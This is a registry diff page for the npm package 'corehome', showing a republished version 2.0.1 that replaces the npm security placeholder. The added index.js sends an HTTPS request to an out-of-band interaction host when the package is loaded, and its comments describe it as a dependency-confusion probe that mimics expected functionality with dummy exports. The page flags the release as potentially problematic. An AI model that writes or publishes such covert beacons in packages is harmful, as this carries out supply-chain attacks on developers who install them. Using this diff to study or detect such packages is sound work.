corehome 0.0.1-security → 2.0.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of corehome might be problematic. Click here for more details.
- package/index.js +11 -0
- package/package.json +9 -3
- package/README.md +0 -5
package/index.js
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
const https = require('https');
|
|
2
|
+
|
|
3
|
+
// Replace your-burp-collaborator.example.com with your actual domain
|
|
4
|
+
https.get('https://cvh61o36okueonkfvda0xidpx1wi74n1y.oast.site/?package=CoreHome', (res) => {
|
|
5
|
+
console.log(`Ping sent, statusCode: ${res.statusCode}`);
|
|
6
|
+
}).on('error', (err) => {
|
|
7
|
+
console.error('Error sending ping:', err);
|
|
8
|
+
});
|
|
9
|
+
|
|
10
|
+
// You can also include dummy exports to mimic expected functionality
|
|
11
|
+
module.exports = {};
|
package/package.json
CHANGED
|
@@ -1,6 +1,12 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "corehome",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "2.0.1",
|
|
4
|
+
"main": "index.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
|
7
|
+
},
|
|
8
|
+
"keywords": [],
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC",
|
|
11
|
+
"description": ""
|
|
6
12
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=corehome for more information.
|